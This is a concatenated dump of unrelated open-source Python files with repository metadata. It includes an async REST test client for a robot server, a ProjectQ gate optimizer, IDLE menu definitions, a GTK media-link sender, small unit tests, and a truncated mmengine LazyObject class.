"""Retry GET /health until reachable."""
while not await self.alive():
# Avoid spamming the server in case a request immediately
# returns some kind of "not ready."
await asyncio.sleep(0.1)
async def _poll_for_dead(self) -> None:
"""Poll GET /health until unreachable."""
while not await self.dead():
# Avoid spamming the server in case a request immediately
# returns some kind of "not ready."
await asyncio.sleep(0.1)
async def wait_until_alive(self, timeout_sec: float = STARTUP_WAIT) -> bool:
try:
await asyncio.wait_for(self._poll_for_alive(), timeout=timeout_sec)
return True
except asyncio.TimeoutError:
return False
async def wait_until_dead(self, timeout_sec: float = SHUTDOWN_WAIT) -> bool:
"""Retry GET /health and until unreachable."""
try:
await asyncio.wait_for(self._poll_for_dead(), timeout=timeout_sec)
return True
except asyncio.TimeoutError:
return False
async def get_health(self) -> Response:
"""GET /health."""
response = await self.httpx_client.get(url=f"{self.base_url}/health")
response.raise_for_status()
return response
async def get_protocols(self) -> Response:
"""GET /protocols."""
response = await self.httpx_client.get(url=f"{self.base_url}/protocols")
response.raise_for_status()
return response
async def get_protocol(self, protocol_id: str) -> Response:
"""GET /protocols/{protocol_id}."""
response = await self.httpx_client.get(
url=f"{self.base_url}/protocols/{protocol_id}"
)
return response
async def post_protocol(
self, files: List[Union[Path, Tuple[str, bytes]]]
) -> Response:
"""POST /protocols.
Params:
files: The files to upload, representing the protocol, custom labware, etc.
Each file file can be provided as a Path, in which case it's read
from the filesystem, or as a (name, contents) tuple.
"""
multipart_upload_name = "files"
with contextlib.ExitStack() as file_exit_stack:
opened_files: List[
Union[BinaryIO, Tuple[str, bytes]],
] = []
for file in files:
if isinstance(file, Path):
opened_file = file_exit_stack.enter_context(file.open("rb"))
opened_files.append(opened_file)
else:
opened_files.append(file)
response = await self.httpx_client.post(
url=f"{self.base_url}/protocols",
files=[(multipart_upload_name, f) for f in opened_files],
)
response.raise_for_status()
return response
async def get_runs(self, length: Optional[int] = None) -> Response:
"""GET /runs."""
response = await self.httpx_client.get(
url=f"{self.base_url}/runs"
if length is None
else f"{self.base_url}/runs?pageLength={length}"
)
response.raise_for_status()
return response
async def post_run(self, req_body: Dict[str, object]) -> Response:
"""POST /runs."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs", json=req_body
)
response.raise_for_status()
return response
async def patch_run(self, run_id: str, req_body: Dict[str, object]) -> Response:
"""POST /runs."""
response = await self.httpx_client.patch(
url=f"{self.base_url}/runs/{run_id}",
json=req_body,
)
response.raise_for_status()
return response
async def get_run(self, run_id: str) -> Response:
"""GET /runs/:run_id."""
response = await self.httpx_client.get(url=f"{self.base_url}/runs/{run_id}")
response.raise_for_status()
return response
async def post_run_command(
self,
run_id: str,
req_body: Dict[str, object],
params: Dict[str, Any],
) -> Response:
"""POST /runs/:run_id/commands."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs/{run_id}/commands",
json=req_body,
params=params,
)
response.raise_for_status()
return response
async def get_run_commands(
self,
run_id: str,
cursor: Optional[int] = None,
page_length: Optional[int] = None,
) -> Response:
"""GET /runs/:run_id/commands."""
query_params = {}
if cursor is not None:
query_params["cursor"] = cursor
if page_length is not None:
query_params["pageLength"] = page_length
response = await self.httpx_client.get(
url=f"{self.base_url}/runs/{run_id}/commands", params=query_params
)
response.raise_for_status()
return response
async def get_run_command(self, run_id: str, command_id: str) -> Response:
"""GET /runs/:run_id/commands/:command_id."""
response = await self.httpx_client.get(
url=f"{self.base_url}/runs/{run_id}/commands/{command_id}",
)
response.raise_for_status()
return response
async def post_labware_offset(
self,
run_id: str,
req_body: Dict[str, object],
) -> Response:
"""POST /runs/:run_id/labware_offsets."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs/{run_id}/labware_offsets",
json=req_body,
)
response.raise_for_status()
return response
async def post_run_action(
self,
run_id: str,
req_body: Dict[str, object],
) -> Response:
"""POST /runs/:run_id/commands."""
response = await self.httpx_client.post(
url=f"{self.base_url}/runs/{run_id}/actions",
json=req_body,
)
response.raise_for_status()
return response
async def get_analyses(self, protocol_id: str) -> Response:
"""GET /protocols/{protocol_id}/analyses."""
response = await self.httpx_client.get(
url=f"{self.base_url}/protocols/{protocol_id}/analyses"
)
response.raise_for_status()
return response
async def get_analysis(self, protocol_id: str, analysis_id: str) -> Response:
"""GET /protocols/{protocol_id}/{analysis_id}."""
response = await self.httpx_client.get(
url=f"{self.base_url}/protocols/{protocol_id}/analyses/{analysis_id}"
)
response.raise_for_status()
return response
async def delete_run(self, run_id: str) -> Response:
"""DELETE /runs/{run_id}."""
response = await self.httpx_client.delete(f"{self.base_url}/runs/{run_id}")
response.raise_for_status()
return response
async def delete_protocol(self, protocol_id: str) -> Response:
"""DELETE /protocols/{protocol_id}."""
response = await self.httpx_client.delete(
f"{self.base_url}/protocols/{protocol_id}"
)
response.raise_for_status()
return response
async def post_setting_reset_options(
self,
req_body: Dict[str, bool],
) -> Response:
"""POST /settings/reset."""
response = await self.httpx_client.post(
url=f"{self.base_url}/settings/reset",
json=req_body,
)
response.raise_for_status()
return response
|
fe87925d687487dafb366c948482d55cf553f80b
|
83b8b30ebb633eecd29ca0a7a20cc43a293c9333
|
/tests/basics/builtin_round_intbig.py
|
adf9d29f2f10c4e1b8b04bb5824fe979b091e0b8
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
adafruit/circuitpython
|
430ec895149d1eb814b505db39b4977a35ee88a7
|
506dca71b0cbb7af749bb51f86b01021db5483b3
|
refs/heads/main
| 2023-08-21T16:30:46.781068
| 2023-08-20T00:39:44
| 2023-08-20T00:39:44
| 66,166,069
| 3,806
| 1,560
|
MIT
| 2023-09-14T19:23:51
| 2016-08-20T20:10:40
|
C
|
UTF-8
|
Python
| false
| false
| 347
|
py
|
builtin_round_intbig.py
|
# test round() with large integer values and second arg
# rounding integers is an optional feature so test for it
try:
round(1, -1)
except NotImplementedError:
print('SKIP')
raise SystemExit
i = 2**70
tests = [
(i, 0), (i, -1), (i, -10), (i, 1),
(-i, 0), (-i, -1), (-i, -10), (-i, 1),
]
for t in tests:
print(round(*t))
|
8ebe153a8092571e779627b4e988b1175e3206f7
|
8188f026dcfa3ca6c4e2d58e6c56d04d24e37a18
|
/projectq/cengines/_optimize.py
|
1cce7317ae01f422b5371c504eadd2d150158ccc
|
[
"Apache-2.0"
] |
permissive
|
ProjectQ-Framework/ProjectQ
|
2e342da0622d4b5d513c15504556e95d3d0e2aea
|
67c660ca18725d23ab0b261a45e34873b6a58d03
|
refs/heads/develop
| 2023-09-04T02:18:25.581119
| 2023-03-09T16:03:57
| 2023-03-09T16:03:57
| 77,520,796
| 886
| 335
|
Apache-2.0
| 2023-07-24T07:07:15
| 2016-12-28T09:31:53
|
Python
|
UTF-8
|
Python
| false
| false
| 11,256
|
py
|
_optimize.py
|
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local optimizer engine."""
import warnings
from projectq.ops import FastForwardingGate, FlushGate, NotMergeable
from ._basics import BasicEngine
class LocalOptimizer(BasicEngine):
"""
Circuit optimization compiler engine.
LocalOptimizer is a compiler engine which optimizes locally (merging rotations, cancelling gates with their
inverse) in a local window of user- defined size.
It stores all commands in a dict of lists, where each qubit has its own gate pipeline. After adding a gate, it
tries to merge / cancel successive gates using the get_merged and get_inverse functions of the gate (if
available). For examples, see BasicRotationGate. Once a list corresponding to a qubit contains >=m gates, the
pipeline is sent on to the next engine.
"""
def __init__(self, cache_size=5, m=None): # pylint: disable=invalid-name
"""
Initialize a LocalOptimizer object.
Args:
cache_size (int): Number of gates to cache per qubit, before sending on the first gate.
"""
super().__init__()
self._l = {} # dict of lists containing operations for each qubit
if m:
warnings.warn(
'Pending breaking API change: LocalOptimizer(m=5) will be dropped in a future version in favor of '
'LinearMapper(cache_size=5)',
DeprecationWarning,
)
cache_size = m
self._cache_size = cache_size # wait for m gates before sending on
# sends n gate operations of the qubit with index idx
def _send_qubit_pipeline(self, idx, n_gates):
"""Send n gate operations of the qubit with index idx to the next engine."""
il = self._l[idx] # pylint: disable=invalid-name
for i in range(min(n_gates, len(il))): # loop over first n operations
# send all gates before n-qubit gate for other qubits involved
# --> recursively call send_helper
other_involved_qubits = [qb for qreg in il[i].all_qubits for qb in qreg if qb.id != idx]
for qb in other_involved_qubits:
qubit_id = qb.id
try:
gateloc = 0
# find location of this gate within its list
while self._l[qubit_id][gateloc] != il[i]:
gateloc += 1
gateloc = self._optimize(qubit_id, gateloc)
# flush the gates before the n-qubit gate
self._send_qubit_pipeline(qubit_id, gateloc)
# delete the n-qubit gate, we're taking care of it
# and don't want the other qubit to do so
self._l[qubit_id] = self._l[qubit_id][1:]
except IndexError: # pragma: no cover
print("Invalid qubit pipeline encountered (in the process of shutting down?).")
# all qubits that need to be flushed have been flushed
# --> send on the n-qubit gate
self.send([il[i]])
# n operations have been sent on --> resize our gate list
self._l[idx] = self._l[idx][n_gates:]
def _get_gate_indices(self, idx, i, qubit_ids):
"""
Return all indices of a command.
Each index corresponding to the command's index in one of the qubits' command lists.
Args:
idx (int): qubit index
i (int): command position in qubit idx's command list
IDs (list<int>): IDs of all qubits involved in the command
"""
N = len(qubit_ids)
# 1-qubit gate: only gate at index i in list #idx is involved
if N == 1:
return [i]
# When the same gate appears multiple time, we need to make sure not to
# match earlier instances of the gate applied to the same qubits. So we
# count how many there are, and skip over them when looking in the
# other lists.
cmd = self._l[idx][i]
num_identical_to_skip = sum(1 for prev_cmd in self._l[idx][:i] if prev_cmd == cmd)
indices = []
for qubit_id in qubit_ids:
identical_indices = [i for i, c in enumerate(self._l[qubit_id]) if c == cmd]
indices.append(identical_indices[num_identical_to_skip])
return indices
def _optimize(self, idx, lim=None):
"""
Gate cancellation routine.
Try to remove identity gates using the is_identity function, then merge or even cancel successive gates using
the get_merged and get_inverse functions of the gate (see, e.g., BasicRotationGate).
It does so for all qubit command lists.
"""
# loop over all qubit indices
i = 0
limit = len(self._l[idx])
if lim is not None:
limit = lim
while i < limit - 1:
# can be dropped if the gate is equivalent to an identity gate
if self._l[idx][i].is_identity():
# determine index of this gate on all qubits
qubitids = [qb.id for sublist in self._l[idx][i].all_qubits for qb in sublist]
gid = self._get_gate_indices(idx, i, qubitids)
for j, qubit_id in enumerate(qubitids):
new_list = (
self._l[qubit_id][0 : gid[j]] + self._l[qubit_id][gid[j] + 1 :] # noqa: E203 # noqa: E203
)
self._l[qubitids[j]] = new_list # pylint: disable=undefined-loop-variable
i = 0
limit -= 1
continue
# can be dropped if two in a row are self-inverses
inv = self._l[idx][i].get_inverse()
if inv == self._l[idx][i + 1]:
# determine index of this gate on all qubits
qubitids = [qb.id for sublist in self._l[idx][i].all_qubits for qb in sublist]
gid = self._get_gate_indices(idx, i, qubitids)
# check that there are no other gates between this and its
# inverse on any of the other qubits involved
erase = True
for j, qubit_id in enumerate(qubitids):
erase *= inv == self._l[qubit_id][gid[j] + 1]
# drop these two gates if possible and goto next iteration
if erase:
for j, qubit_id in enumerate(qubitids):
new_list = (
self._l[qubit_id][0 : gid[j]] + self._l[qubit_id][gid[j] + 2 :] # noqa: E203 # noqa: E203
)
self._l[qubit_id] = new_list
i = 0
limit -= 2
continue
# gates are not each other's inverses --> check if they're
# mergeable
try:
merged_command = self._l[idx][i].get_merged(self._l[idx][i + 1])
# determine index of this gate on all qubits
qubitids = [qb.id for sublist in self._l[idx][i].all_qubits for qb in sublist]
gid = self._get_gate_indices(idx, i, qubitids)
merge = True
for j, qubit_id in enumerate(qubitids):
merged = self._l[qubit_id][gid[j]].get_merged(self._l[qubit_id][gid[j] + 1])
merge *= merged == merged_command
if merge:
for j, qubit_id in enumerate(qubitids):
self._l[qubit_id][gid[j]] = merged_command
new_list = (
self._l[qubit_id][0 : gid[j] + 1] # noqa: E203
+ self._l[qubit_id][gid[j] + 2 :] # noqa: E203
)
self._l[qubit_id] = new_list
i = 0
limit -= 1
continue
except NotMergeable:
pass # can't merge these two commands.
i += 1 # next iteration: look at next gate
return limit
def _check_and_send(self):
"""Check whether a qubit pipeline must be sent on and, if so, optimize the pipeline and then send it on."""
# NB: self.optimize(i) modifies self._l
for i in self._l: # pylint: disable=consider-using-dict-items
if (
len(self._l[i]) >= self._cache_size
or len(self._l[i]) > 0
and isinstance(self._l[i][-1].gate, FastForwardingGate)
):
self._optimize(i)
if len(self._l[i]) >= self._cache_size and not isinstance(self._l[i][-1].gate, FastForwardingGate):
self._send_qubit_pipeline(i, len(self._l[i]) - self._cache_size + 1)
elif len(self._l[i]) > 0 and isinstance(self._l[i][-1].gate, FastForwardingGate):
self._send_qubit_pipeline(i, len(self._l[i]))
new_dict = {}
for idx, _l in self._l.items():
if len(_l) > 0:
new_dict[idx] = _l
self._l = new_dict
def _cache_cmd(self, cmd):
"""Cache a command, i.e., inserts it into the command lists of all qubits involved."""
# are there qubit ids that haven't been added to the list?
idlist = [qubit.id for sublist in cmd.all_qubits for qubit in sublist]
# add gate command to each of the qubits involved
for qubit_id in idlist:
if qubit_id not in self._l:
self._l[qubit_id] = []
self._l[qubit_id] += [cmd]
self._check_and_send()
def receive(self, command_list):
"""
Receive a list of commands.
Receive commands from the previous engine and cache them. If a flush gate arrives, the entire buffer is sent
on.
"""
for cmd in command_list:
if cmd.gate == FlushGate(): # flush gate --> optimize and flush
# NB: self.optimize(i) modifies self._l
for idx in self._l: # pylint: disable=consider-using-dict-items
self._optimize(idx)
self._send_qubit_pipeline(idx, len(self._l[idx]))
new_dict = {}
for idx, _l in self._l.items():
if len(_l) > 0: # pragma: no cover
new_dict[idx] = _l
self._l = new_dict
if self._l: # pragma: no cover
raise RuntimeError('Internal compiler error: qubits remaining in LocalOptimizer after a flush!')
self.send([cmd])
else:
self._cache_cmd(cmd)
|
698b47661f82e04c3d5b65bda27d7636ec3fe061
|
6fe86ea636a69fff9174df6407839f0164407bdb
|
/tt/cross/oldcross/cross.py
|
65bf062a06724aae9866ddb28181951872f109e0
|
[
"MIT"
] |
permissive
|
oseledets/ttpy
|
9104e8014a73667b1cfc4fd867593cd8a6097ba0
|
a50d5e0ce2a033a4b1aa703715cb85d715b9b34a
|
refs/heads/master
| 2023-03-06T12:44:43.804115
| 2022-12-14T23:37:57
| 2022-12-14T23:37:57
| 5,499,019
| 220
| 77
|
MIT
| 2022-12-14T23:37:58
| 2012-08-21T18:22:27
|
Python
|
UTF-8
|
Python
| false
| false
| 304
|
py
|
cross.py
|
import numpy as np
import tt
""" This module is an implementation of the cross method for tensors """
""" What we do, we gradually apply 2d methods, and we basically need to recompute
UU^{-1} and VV^{-1} each time; the problem is then to go to next step in a sweep"""
def cross(n, f):
pass
|
93e5e5101eea670a54eb5f2a366ce45e21029876
|
9677df3908029dcc4abdbe1f88190fc1d71dce7d
|
/app/ui/transmitter.py
|
726a311b3ed7dcc3c04d4f86f051fb4772236e60
|
[
"MIT",
"GPL-3.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
DYefremov/DemonEditor
|
b6e467fe8191badca3ae81ceaeeed745952aca4c
|
917e184486ff212b4a19b36ab726343f900da8b7
|
refs/heads/master
| 2023-08-06T05:37:32.674377
| 2023-07-25T13:44:31
| 2023-07-25T13:44:31
| 106,046,839
| 105
| 331
|
MIT
| 2023-06-10T16:08:08
| 2017-10-06T20:19:57
|
Python
|
UTF-8
|
Python
| false
| false
| 6,992
|
py
|
transmitter.py
|
from pathlib import Path
from urllib.parse import urlparse
import gi
from gi.repository import GLib
from app.commons import log
from app.connections import HttpAPI
from app.tools.yt import YouTube
from app.ui.dialogs import get_builder
from app.ui.iptv import get_yt_icon
from .uicommons import Gtk, Gdk, UI_RESOURCES_PATH
class LinksTransmitter:
""" The main class for the "send to" function.
It used for direct playback of media links by the enigma2 media player.
"""
__STREAM_PREFIX = "4097:0:1:0:0:0:0:0:0:0:"
def __init__(self, http_api, app_window, settings):
handlers = {"on_popup_menu": self.on_popup_menu,
"on_status_icon_activate": self.on_status_icon_activate,
"on_url_changed": self.on_url_changed,
"on_url_activate": self.on_url_activate,
"on_drag_data_received": self.on_drag_data_received,
"on_previous": self.on_previous,
"on_next": self.on_next,
"on_stop": self.on_stop,
"on_clear": self.on_clear,
"on_play": self.on_play}
self._http_api = http_api
self._app_window = app_window
self._is_status_icon = True
builder = get_builder(UI_RESOURCES_PATH + "transmitter.glade", handlers)
self._main_window = builder.get_object("main_window")
self._url_entry = builder.get_object("url_entry")
self._tool_bar = builder.get_object("tool_bar")
self._popup_menu = builder.get_object("staus_popup_menu")
self._restore_menu_item = builder.get_object("restore_menu_item")
self._status_active = None
self._status_passive = None
self._yt = YouTube.get_instance(settings)
try:
gi.require_version("AppIndicator3", "0.1")
from gi.repository import AppIndicator3
except (ImportError, ValueError) as e:
log("{}: Load library error: {}".format(__class__.__name__, e))
self._tray = builder.get_object("status_icon")
else:
self._is_status_icon = False
self._status_active = AppIndicator3.IndicatorStatus.ACTIVE
self._status_passive = AppIndicator3.IndicatorStatus.PASSIVE
category = AppIndicator3.IndicatorCategory.APPLICATION_STATUS
path = Path(UI_RESOURCES_PATH + "/icons/hicolor/scalable/apps/demon-editor.svg")
path = str(path.resolve()) if path.is_file() else "demon-editor"
self._tray = AppIndicator3.Indicator.new("DemonEditor", path, category)
self._tray.set_status(self._status_active)
self._tray.set_secondary_activate_target(builder.get_object("show_menu_item"))
self._tray.set_menu(self._popup_menu)
style_provider = Gtk.CssProvider()
style_provider.load_from_path(UI_RESOURCES_PATH + "style.css")
self._url_entry.get_style_context().add_provider_for_screen(Gdk.Screen.get_default(), style_provider,
Gtk.STYLE_PROVIDER_PRIORITY_USER)
def show(self, show):
if self._is_status_icon:
self._tray.set_visible(show)
elif self._status_active:
self._tray.set_status(self._status_active if show else self._status_passive)
if not show:
self.hide()
def hide(self):
self._main_window.hide()
def on_popup_menu(self, menu, button, time):
menu.popup(None, None, None, None, button, time)
def on_status_icon_activate(self, window):
visible = window.get_visible()
window.hide() if visible else window.show()
self._app_window.present() if visible else self._app_window.iconify()
def on_url_changed(self, entry):
entry.set_name("GtkEntry" if self.is_url(entry.get_text()) else "digit-entry")
def on_url_activate(self, entry):
gen = self.activate_url(entry.get_text())
GLib.idle_add(lambda: next(gen, False), priority=GLib.PRIORITY_LOW)
def on_drag_data_received(self, entry, drag_context, x, y, data, info, time):
url = data.get_text()
GLib.idle_add(entry.set_text, url)
gen = self.activate_url(url)
GLib.idle_add(lambda: next(gen, False), priority=GLib.PRIORITY_LOW)
def activate_url(self, url):
self._url_entry.set_name("GtkEntry")
self._url_entry.set_icon_from_stock(Gtk.EntryIconPosition.SECONDARY, None)
if self.is_url(url):
self._tool_bar.set_sensitive(False)
yt_id = YouTube.get_yt_id(url)
yield True
if yt_id:
self._url_entry.set_icon_from_pixbuf(Gtk.EntryIconPosition.SECONDARY, get_yt_icon("youtube", 32))
links, title = self._yt.get_yt_link(yt_id, url)
yield True
if links:
url = links[sorted(links, key=lambda x: int(x.rstrip("p")), reverse=True)[0]]
else:
self.on_done(links)
return
else:
self._url_entry.set_icon_from_stock(Gtk.EntryIconPosition.SECONDARY, None)
self._http_api.send(HttpAPI.Request.PLAY, url, self.on_done, self.__STREAM_PREFIX)
yield True
def on_done(self, res):
""" Play callback """
res = res.get("e2state", None) if res else res
self._url_entry.set_name("GtkEntry" if res else "digit-entry")
GLib.idle_add(self._tool_bar.set_sensitive, True)
def on_previous(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_PREV, None, self.on_done)
def on_next(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_NEXT, None, self.on_done)
def on_play(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_PLAY, None, self.on_done)
def on_stop(self, item):
self._http_api.send(HttpAPI.Request.PLAYER_STOP, None, self.on_done)
def on_clear(self, item):
""" Remove added links in the playlist. """
GLib.idle_add(self._tool_bar.set_sensitive, False)
self._http_api.send(HttpAPI.Request.PLAYER_LIST, None, self.clear_playlist)
def clear_playlist(self, res):
GLib.idle_add(self._tool_bar.set_sensitive, not res)
if "error_code" in res:
log("Error clearing playlist. There may be no http connection.")
self.on_done(res)
return
for ref in res:
GLib.idle_add(self._tool_bar.set_sensitive, False)
self._http_api.send(HttpAPI.Request.PLAYER_REMOVE,
ref.get("e2servicereference", ""),
self.on_done,
self.__STREAM_PREFIX)
@staticmethod
def is_url(text):
""" Simple url checking. """
result = urlparse(text)
return result.scheme and result.netloc
if __name__ == "__main__":
pass
|
ac3e5e4de01351712c876b1b2640cae5296be869
|
e3bb1df7fa4c51900dec7e9ddf5295e1a80938bd
|
/test/hummingbot/connector/exchange/binance/test_binance_web_utils.py
|
bf7f1d14fd8adbed3cf841350eb294961b1fa9c9
|
[
"Apache-2.0"
] |
permissive
|
CoinAlpha/hummingbot
|
0d1e2bd94de1280748647108c7d7800a09546eb8
|
c3f101759ab7e7a2165cd23a3a3e94c90c642a9b
|
refs/heads/development
| 2023-09-01T11:24:43.322137
| 2023-08-31T03:08:06
| 2023-08-31T03:08:06
| 439,330,952
| 135
| 98
|
Apache-2.0
| 2023-08-30T13:55:08
| 2021-12-17T12:50:42
|
Python
|
UTF-8
|
Python
| false
| false
| 776
|
py
|
test_binance_web_utils.py
|
import unittest
import hummingbot.connector.exchange.binance.binance_constants as CONSTANTS
from hummingbot.connector.exchange.binance import binance_web_utils as web_utils
class BinanceUtilTestCases(unittest.TestCase):
def test_public_rest_url(self):
path_url = "/TEST_PATH"
domain = "com"
expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PUBLIC_API_VERSION + path_url
self.assertEqual(expected_url, web_utils.public_rest_url(path_url, domain))
def test_private_rest_url(self):
path_url = "/TEST_PATH"
domain = "com"
expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PRIVATE_API_VERSION + path_url
self.assertEqual(expected_url, web_utils.private_rest_url(path_url, domain))
|
dbc7417a8c72a015a52381427c6d5bc5ea4b819d
|
fdbb74a95924e2677466614f6ab6e2bb13b2a95a
|
/third_party/python/Lib/idlelib/mainmenu.py
|
9fe6b5229446e3072744db46de8a3001f6adff47
|
[
"ISC",
"Python-2.0",
"GPL-1.0-or-later",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
jart/cosmopolitan
|
fb11b5658939023977060a7c6c71a74093d9cb44
|
0d748ad58e1063dd1f8560f18a0c75293b9415b7
|
refs/heads/master
| 2023-09-06T09:17:29.303607
| 2023-09-02T03:49:13
| 2023-09-02T03:50:18
| 272,457,606
| 11,887
| 435
|
ISC
| 2023-09-14T17:47:58
| 2020-06-15T14:16:13
|
C
|
UTF-8
|
Python
| false
| false
| 3,703
|
py
|
mainmenu.py
|
"""Define the menu contents, hotkeys, and event bindings.
There is additional configuration information in the EditorWindow class (and
subclasses): the menus are created there based on the menu_specs (class)
variable, and menus not created are silently skipped in the code here. This
makes it possible, for example, to define a Debug menu which is only present in
the PythonShell window, and a Format menu which is only present in the Editor
windows.
"""
from importlib.util import find_spec
from idlelib.config import idleConf
# Warning: menudefs is altered in macosx.overrideRootMenu()
# after it is determined that an OS X Aqua Tk is in use,
# which cannot be done until after Tk() is first called.
# Do not alter the 'file', 'options', or 'help' cascades here
# without altering overrideRootMenu() as well.
# TODO: Make this more robust
menudefs = [
# underscore prefixes character to underscore
('file', [
('_New File', '<<open-new-window>>'),
('_Open...', '<<open-window-from-file>>'),
('Open _Module...', '<<open-module>>'),
('Module _Browser', '<<open-class-browser>>'),
('_Path Browser', '<<open-path-browser>>'),
None,
('_Save', '<<save-window>>'),
('Save _As...', '<<save-window-as-file>>'),
('Save Cop_y As...', '<<save-copy-of-window-as-file>>'),
None,
('Prin_t Window', '<<print-window>>'),
None,
('_Close', '<<close-window>>'),
('E_xit', '<<close-all-windows>>'),
]),
('edit', [
('_Undo', '<<undo>>'),
('_Redo', '<<redo>>'),
None,
('Cu_t', '<<cut>>'),
('_Copy', '<<copy>>'),
('_Paste', '<<paste>>'),
('Select _All', '<<select-all>>'),
None,
('_Find...', '<<find>>'),
('Find A_gain', '<<find-again>>'),
('Find _Selection', '<<find-selection>>'),
('Find in Files...', '<<find-in-files>>'),
('R_eplace...', '<<replace>>'),
('Go to _Line', '<<goto-line>>'),
('S_how Completions', '<<force-open-completions>>'),
('E_xpand Word', '<<expand-word>>'),
('Show C_all Tip', '<<force-open-calltip>>'),
('Show Surrounding P_arens', '<<flash-paren>>'),
]),
('format', [
('_Indent Region', '<<indent-region>>'),
('_Dedent Region', '<<dedent-region>>'),
('Comment _Out Region', '<<comment-region>>'),
('U_ncomment Region', '<<uncomment-region>>'),
('Tabify Region', '<<tabify-region>>'),
('Untabify Region', '<<untabify-region>>'),
('Toggle Tabs', '<<toggle-tabs>>'),
('New Indent Width', '<<change-indentwidth>>'),
('F_ormat Paragraph', '<<format-paragraph>>'),
('S_trip Trailing Whitespace', '<<do-rstrip>>'),
]),
('run', [
('Python Shell', '<<open-python-shell>>'),
('C_heck Module', '<<check-module>>'),
('R_un Module', '<<run-module>>'),
]),
('shell', [
('_View Last Restart', '<<view-restart>>'),
('_Restart Shell', '<<restart-shell>>'),
None,
('_Interrupt Execution', '<<interrupt-execution>>'),
]),
('debug', [
('_Go to File/Line', '<<goto-file-line>>'),
('!_Debugger', '<<toggle-debugger>>'),
('_Stack Viewer', '<<open-stack-viewer>>'),
('!_Auto-open Stack Viewer', '<<toggle-jit-stack-viewer>>'),
]),
('options', [
('Configure _IDLE', '<<open-config-dialog>>'),
('_Code Context', '<<toggle-code-context>>'),
]),
('window', [
('Zoom Height', '<<zoom-height>>'),
]),
('help', [
('_About IDLE', '<<about-idle>>'),
None,
('_IDLE Help', '<<help>>'),
('Python _Docs', '<<python-docs>>'),
]),
]
if find_spec('turtledemo'):
menudefs[-1][1].append(('Turtle Demo', '<<open-turtle-demo>>'))
default_keydefs = idleConf.GetCurrentKeySet()
if __name__ == '__main__':
from unittest import main
main('idlelib.idle_test.test_mainmenu', verbosity=2)
|
7fda73abc5ac7244025aba4b341e99956d07d864
|
f729993e43a8f2031a4ad5c766e63117588b4312
|
/mmengine/config/lazy.py
|
e83cce7c89cbd919def774addaaac8186c10e989
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmengine
|
d28a41c4b3dac47c58ee19b241c4b963eb14ddb6
|
170758aefe6cb05f61bf9353d03af1b8c1f4f73a
|
refs/heads/main
| 2023-08-29T18:12:33.261889
| 2023-08-28T08:15:00
| 2023-08-28T08:15:00
| 456,857,425
| 708
| 279
|
Apache-2.0
| 2023-09-14T09:23:21
| 2022-02-08T09:05:09
|
Python
|
UTF-8
|
Python
| false
| false
| 8,731
|
py
|
lazy.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import importlib
from typing import Any, Optional, Union
from mmengine.utils import is_seq_of
class LazyObject:
"""LazyObject is used to lazily initialize the imported module during
parsing the configuration file.
During parsing process, the syntax like:
Examples:
>>> import torch.nn as nn
>>> from mmdet.models import RetinaNet
>>> import mmcls.models
>>> import mmcls.datasets
>>> import mmcls
Will be parsed as:
Examples:
>>> # import torch.nn as nn
>>> nn = lazyObject('torch.nn')
>>> # from mmdet.models import RetinaNet
>>> RetinaNet = lazyObject('mmdet.models', 'RetinaNet')
>>> # import mmcls.models; import mmcls.datasets; import mmcls
>>> mmcls = lazyObject(['mmcls', 'mmcls.datasets', 'mmcls.models'])
``LazyObject`` records all module information and will be further
referenced by the configuration file.
Args:
module (str or list or tuple): The module name to be imported.
imported (str, optional): The imported module name. Defaults to None.
location (str, optional): The filename and line number of the imported
module statement happened.
"""
def __init__(self,
module: Union[str, list, tuple],
imported: Optional[str] = None,
location: Optional[str] = None):
if not isinstance(module, str) and not is_seq_of(module, str):
raise TypeError('module should be `str`, `list`, or `tuple`'
f'but got {type(module)}, this might be '
'a bug of MMEngine, please report it to '
'https://github.com/open-mmlab/mmengine/issues')
self._module: Union[str, list, tuple] = module
if not isinstance(imported, str) and imported is not None:
raise TypeError('imported should be `str` or None, but got '
f'{type(imported)}, this might be '
'a bug of MMEngine, please report it to '
'https://github.com/open-mmlab/mmengine/issues')
self._imported = imported
self.location = location
def build(self) -> Any:
"""Return imported object.
Returns:
Any: Imported object
"""
if isinstance(self._module, str):
try:
module = importlib.import_module(self._module)
except Exception as e:
raise type(e)(f'Failed to import {self._module} '
f'in {self.location} for {e}')
if self._imported is not None:
if hasattr(module, self._imported):
module = getattr(module, self._imported)
else:
raise ImportError(
f'Failed to import {self._imported} '
f'from {self._module} in {self.location}')
return module
else:
# import xxx.xxx
# import xxx.yyy
# import xxx.zzz
# return imported xxx
try:
for module in self._module:
importlib.import_module(module) # type: ignore
module_name = self._module[0].split('.')[0]
return importlib.import_module(module_name)
except Exception as e:
raise type(e)(f'Failed to import {self.module} '
f'in {self.location} for {e}')
@property
def module(self):
if isinstance(self._module, str):
return self._module
return self._module[0].split('.')[0]
def __call__(self, *args, **kwargs):
raise RuntimeError()
def __deepcopy__(self, memo):
return LazyObject(self._module, self._imported, self.location)
def __getattr__(self, name):
# Cannot locate the line number of the getting attribute.
# Therefore only record the filename.
if self.location is not None:
location = self.location.split(', line')[0]
else:
location = self.location
return LazyAttr(name, self, location)
def __str__(self) -> str:
if self._imported is not None:
return self._imported
return self.module
__repr__ = __str__
# `pickle.dump` will try to get the `__getstate__` and `__setstate__`
# methods of the dumped object. If these two methods are not defined,
